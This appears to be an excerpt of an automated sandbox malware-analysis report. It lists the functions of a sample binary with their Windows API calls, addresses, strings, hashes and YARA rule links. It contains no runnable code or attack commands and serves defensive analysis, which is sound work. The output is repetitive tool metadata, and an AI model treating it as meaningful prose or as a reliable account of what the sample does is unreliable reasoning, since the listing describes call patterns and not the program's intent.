                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                • String ID:
                                                • API String ID: 2706829360-0
                                                • Opcode ID: 1e23bfa8022f85a788433e53c78c3893dcbbdd5eaa93f60ffd83ea055bb1d342
                                                • Instruction ID: c5b482d17e4e4f90a8195bbe6688e14e89ba899db8c6c172a2b4ae18a4ff04f8
                                                • Opcode Fuzzy Hash: 1e23bfa8022f85a788433e53c78c3893dcbbdd5eaa93f60ffd83ea055bb1d342
                                                • Instruction Fuzzy Hash: 5F412D35A00219DFCB04DFA4D888EAEBBB9EF48354F00C06DE955A7261CB78A945CF94
                                                Function 007E84D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00779997: __itow.LIBCMT ref: 007799C2
                                                  • Part of subcall function 00779997: __swprintf.LIBCMT ref: 00779A0C
                                                • CoInitialize.OLE32 ref: 007E8518
                                                • CoUninitialize.OLE32 ref: 007E8523
                                                • CoCreateInstance.OLE32(?,00000000,00000017,00802BEC,?), ref: 007E8583
                                                • IIDFromString.OLE32(?,?), ref: 007E85F6
                                                • VariantInit.OLEAUT32(?), ref: 007E8690
                                                • VariantClear.OLEAUT32(?), ref: 007E86F1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                • API String ID: 834269672-1287834457
                                                • Opcode ID: 68d999012018b47b47bdd33fba5504e7c6c8be94e00b2fc7a4b1c40aa79119e4
                                                • Instruction ID: 93d32130556266e03cce2cdaea10a84bfb7258fa821e8482b1a35579d5477fe9
                                                • Opcode Fuzzy Hash: 68d999012018b47b47bdd33fba5504e7c6c8be94e00b2fc7a4b1c40aa79119e4
                                                • Instruction Fuzzy Hash: 13618B70209351DFCB50DF25C848B6ABBE8AF48754F048819F9899B291CF78ED44CB92
                                                Function 007E5848 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WSAStartup.WSOCK32(00000101,?), ref: 007E58A9
                                                • inet_addr.WSOCK32(?,?,?), ref: 007E58EE
                                                • gethostbyname.WSOCK32(?), ref: 007E58FA
                                                • IcmpCreateFile.IPHLPAPI ref: 007E5908
                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007E5978
                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 007E598E
                                                • IcmpCloseHandle.IPHLPAPI(00000000), ref: 007E5A03
                                                • WSACleanup.WSOCK32 ref: 007E5A09
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                • String ID: Ping
                                                • API String ID: 1028309954-2246546115
                                                • Opcode ID: 9514bb01eedcfd812bbde52fdba9bab1245972aa72ecd0f7725da2749b0ce500
                                                • Instruction ID: a9c7754551bafbf41e1c5a07e47c37fdf749a408826fb365a769c1434caa1f2a
                                                • Opcode Fuzzy Hash: 9514bb01eedcfd812bbde52fdba9bab1245972aa72ecd0f7725da2749b0ce500
                                                • Instruction Fuzzy Hash: E951B031605740DFDB10AF25CC89B6AB7E4EF48724F048929F99ADB2A1DB78EC00CB51
                                                Function 007DB54F Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 007DB55C
                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 007DB5D2
                                                • GetLastError.KERNEL32 ref: 007DB5DC
                                                • SetErrorMode.KERNEL32(00000000,READY), ref: 007DB649
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                • API String ID: 4194297153-14809454
                                                • Opcode ID: bfc392b1b9bfeac66a9c2c82de731f9a61f4c5cf40e9bb3cd6accd07595ce843
                                                • Instruction ID: 27af82ac7e38a90787a6572eaeb49ee6915b24cbc5ab8f90ebcb4f66d1f4b760
                                                • Opcode Fuzzy Hash: bfc392b1b9bfeac66a9c2c82de731f9a61f4c5cf40e9bb3cd6accd07595ce843
                                                • Instruction Fuzzy Hash: 45319C75A00209DFCB00EFA4D889ABDB7B4FF44350F15802AE916E7391DB789A41CB91
                                                Function 007C9251 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00777F41: _memmove.LIBCMT ref: 00777F82
                                                  • Part of subcall function 007CAEA4: GetClassNameW.USER32(?,?,000000FF), ref: 007CAEC7
                                                • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 007C92D6
                                                • GetDlgCtrlID.USER32 ref: 007C92E1
                                                • GetParent.USER32 ref: 007C92FD
                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 007C9300
                                                • GetDlgCtrlID.USER32(?), ref: 007C9309
                                                • GetParent.USER32(?), ref: 007C9325
                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 007C9328
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 1536045017-1403004172
                                                • Opcode ID: 7468eebf280f3788011b1a453e9493992f286873e14922d4f8050a602af2badb
                                                • Instruction ID: 797238486e704935b4765a24f2107788909054b258bb290871379e0faa227945
                                                • Opcode Fuzzy Hash: 7468eebf280f3788011b1a453e9493992f286873e14922d4f8050a602af2badb
                                                • Instruction Fuzzy Hash: AC21B070A00208BBDF04AB60CC89EFEBB64FF49310F108169F961972E1DF7D5816DA24
                                                Function 007C933C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00777F41: _memmove.LIBCMT ref: 00777F82
                                                  • Part of subcall function 007CAEA4: GetClassNameW.USER32(?,?,000000FF), ref: 007CAEC7
                                                • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 007C93BF
                                                • GetDlgCtrlID.USER32 ref: 007C93CA
                                                • GetParent.USER32 ref: 007C93E6
                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 007C93E9
                                                • GetDlgCtrlID.USER32(?), ref: 007C93F2
                                                • GetParent.USER32(?), ref: 007C940E
                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 007C9411
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 1536045017-1403004172
                                                • Opcode ID: a1099708e6b9995455bd32de59b5f9d0134416923ee36e397c0b56c21e97f90f
                                                • Instruction ID: 07eb40624ea8ddab9d0cac1486d2192264ba8634c49ee8a1c4c367313b049168
                                                • Opcode Fuzzy Hash: a1099708e6b9995455bd32de59b5f9d0134416923ee36e397c0b56c21e97f90f
                                                • Instruction Fuzzy Hash: 1621A174A00208FBDF04ABA4CC89EFEBB64EF49300F108169F921972A1DF7D5916DA24
                                                Function 007C9425 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetParent.USER32 ref: 007C9431
                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 007C9446
                                                • _wcscmp.LIBCMT ref: 007C9458
                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 007C94D3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ClassMessageNameParentSend_wcscmp
                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                • API String ID: 1704125052-3381328864
                                                • Opcode ID: f6097f79e3f92ad81d34f77830bcf55ecd7b79c4535958f371c074c5f88c2251
                                                • Instruction ID: 26588a753421af4955e67f4e78f489ce7e007e11c589ecc95f1a69dd2ad6bc85
                                                • Opcode Fuzzy Hash: f6097f79e3f92ad81d34f77830bcf55ecd7b79c4535958f371c074c5f88c2251
                                                • Instruction Fuzzy Hash: 54110A7624C356F9FA142624FC0FEB7779CDF05320B20402EFA14E41E1FE5D5A928554
                                                Function 007E89C0 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VariantInit.OLEAUT32(?), ref: 007E89EC
                                                • CoInitialize.OLE32(00000000), ref: 007E8A19
                                                • CoUninitialize.OLE32 ref: 007E8A23
                                                • GetRunningObjectTable.OLE32(00000000,?), ref: 007E8B23
                                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 007E8C50
                                                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00802C0C), ref: 007E8C84
                                                • CoGetObject.OLE32(?,00000000,00802C0C,?), ref: 007E8CA7
                                                • SetErrorMode.KERNEL32(00000000), ref: 007E8CBA
                                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 007E8D3A
                                                • VariantClear.OLEAUT32(?), ref: 007E8D4A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                • String ID:
                                                • API String ID: 2395222682-0
                                                • Opcode ID: 32492f8171ae20b4395204eba3ffe3649c03d00fb862ada394d3f0f9e4cf13d6
                                                • Instruction ID: ae14fb7282d9919549565e8466e45a4892129d8b0eaa35c835effd88df455e96
                                                • Opcode Fuzzy Hash: 32492f8171ae20b4395204eba3ffe3649c03d00fb862ada394d3f0f9e4cf13d6
                                                • Instruction Fuzzy Hash: 66C143B1209345AFC740DF65C88492BB7E9FF89348F00896DF58A9B260DB75ED05CB62
                                                Function 007D7A39 Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                                Download Yara Rule
                                                APIs
                                                • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 007D7B15
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ArraySafeVartype
                                                • String ID:
                                                • API String ID: 1725837607-0
                                                • Opcode ID: bb3008c6693042514cb8d6a587a0a1a961391b6152b67b586f04f12fba73137c
                                                • Instruction ID: 93bb7c787d2269bc6f268428d5b078ca58c6e91d8da4999e483d2d80744a4c99
                                                • Opcode Fuzzy Hash: bb3008c6693042514cb8d6a587a0a1a961391b6152b67b586f04f12fba73137c
                                                • Instruction Fuzzy Hash: 60B19171A0421ADFDB14DF94C885BBEB7B5EF48321F24846AE505EB351E738A941CBA0
                                                Function 007D14FF Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentThreadId.KERNEL32 ref: 007D1521
                                                • GetForegroundWindow.USER32(00000000,?,?,?,?,?,007D0599,?,00000001), ref: 007D1535
                                                • GetWindowThreadProcessId.USER32(00000000), ref: 007D153C
                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007D0599,?,00000001), ref: 007D154B
                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 007D155D
                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007D0599,?,00000001), ref: 007D1576
                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007D0599,?,00000001), ref: 007D1588
                                                • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,007D0599,?,00000001), ref: 007D15CD
                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,007D0599,?,00000001), ref: 007D15E2
                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,007D0599,?,00000001), ref: 007D15ED
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                • String ID:
                                                • API String ID: 2156557900-0
                                                • Opcode ID: e61794d186cb354a6a5c920d490a46e6c911ca96e2871fc1c7097178dbcf5c41
                                                • Instruction ID: 7e044b56e118ea3b79851b88c2a8399889bd0949ad436e6d11229e0cc8fdc4cb
                                                • Opcode Fuzzy Hash: e61794d186cb354a6a5c920d490a46e6c911ca96e2871fc1c7097178dbcf5c41
                                                • Instruction Fuzzy Hash: 89312C75900204FBDB119F58FD84B7977BABB94311F50C426F906D62A0EF7C9960CB64
                                                Function 0077FBBD Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0077FC06
                                                • OleUninitialize.OLE32(?,00000000), ref: 0077FCA5
                                                • UnregisterHotKey.USER32(?), ref: 0077FDFC
                                                • DestroyWindow.USER32(?), ref: 007B492F
                                                • FreeLibrary.KERNEL32(?), ref: 007B4994
                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 007B49C1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                • String ID: close all
                                                • API String ID: 469580280-3243417748
                                                • Opcode ID: dd27f2cc6a9f55fbed4b09b8b7f5a33a82d2da934fca48c0f43d8e428e4a0f8e
                                                • Instruction ID: a8ced8f4aaa402652c01c3bffd6be54613f68ea1db6d04bb0f8e1925fb177140
                                                • Opcode Fuzzy Hash: dd27f2cc6a9f55fbed4b09b8b7f5a33a82d2da934fca48c0f43d8e428e4a0f8e
                                                • Instruction Fuzzy Hash: FDA16F31701212DFCB29EF14C999B69F764FF04750F1582ADE90AAB262DB38AD12CF54
                                                Function 007CA473 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                Download Yara Rule
                                                APIs
                                                • EnumChildWindows.USER32(?,007CA844), ref: 007CA782
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ChildEnumWindows
                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                • API String ID: 3555792229-1603158881
                                                • Opcode ID: 43349577e6124a3255558992068c9cf3d3d1377b1655e7fb99c78bce7a65dabc
                                                • Instruction ID: 65f992e009babe5515c13efe2d8b695b10a33a68a632bcb17dbe552c12b7d067
                                                • Opcode Fuzzy Hash: 43349577e6124a3255558992068c9cf3d3d1377b1655e7fb99c78bce7a65dabc
                                                • Instruction Fuzzy Hash: EB91A070A0060AEBCF08DFA0D885FE9FB74BF04348F54811DD959A7151DB38A999DBA1
                                                Function 00772E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SetWindowLongW.USER32(?,000000EB), ref: 00772EAE
                                                  • Part of subcall function 00771DB3: GetClientRect.USER32(?,?), ref: 00771DDC
                                                  • Part of subcall function 00771DB3: GetWindowRect.USER32(?,?), ref: 00771E1D
                                                  • Part of subcall function 00771DB3: ScreenToClient.USER32(?,?), ref: 00771E45
                                                • GetDC.USER32 ref: 007ACEB2
                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 007ACEC5
                                                • SelectObject.GDI32(00000000,00000000), ref: 007ACED3
                                                • SelectObject.GDI32(00000000,00000000), ref: 007ACEE8
                                                • ReleaseDC.USER32(?,00000000), ref: 007ACEF0
                                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 007ACF7B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                • String ID: U
                                                • API String ID: 4009187628-3372436214
                                                • Opcode ID: f1247c8d2711637d9c651c051c63e6b10cf109ecbc3629ccb8d745762a9eecd9
                                                • Instruction ID: 8bf743b712e59acd2a7d9e6d3fa349739de2e735728f1a35a7215a1f84004575
                                                • Opcode Fuzzy Hash: f1247c8d2711637d9c651c051c63e6b10cf109ecbc3629ccb8d745762a9eecd9
                                                • Instruction Fuzzy Hash: E371C531500205EFCF229F64C884ABA7BB6FF8A350F14836AFD655A266C7398C41DF61
                                                Function 007E1B2B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007E1B66
                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 007E1B92
                                                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 007E1BD4
                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 007E1BE9
                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007E1BF6
                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 007E1C26
                                                • InternetCloseHandle.WININET(00000000), ref: 007E1C6D
                                                  • Part of subcall function 007E2599: GetLastError.KERNEL32(?,?,007E192D,00000000,00000000,00000001), ref: 007E25AE
                                                  • Part of subcall function 007E2599: SetEvent.KERNEL32(?,?,007E192D,00000000,00000000,00000001), ref: 007E25C3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                • String ID:
                                                • API String ID: 2603140658-3916222277
                                                • Opcode ID: 53a12671750ef61218c4f1261ccedf607d6f2265b0f441fed856bbdcc3c71cde
                                                • Instruction ID: 8e5473055a546272d3a832acf7dc012465af89e5df8abf27d8fcdc00ae9bd6e4
                                                • Opcode Fuzzy Hash: 53a12671750ef61218c4f1261ccedf607d6f2265b0f441fed856bbdcc3c71cde
                                                • Instruction Fuzzy Hash: D1417EB1502248BFEB119F61CC8AFBB77ACFF08354F508126F9059A151EB789D45CBA4
                                                Function 007E8D5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,?,007FF910), ref: 007E8E3D
                                                • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,007FF910), ref: 007E8E71
                                                • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 007E8FEB
                                                • SysFreeString.OLEAUT32(?), ref: 007E9015
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
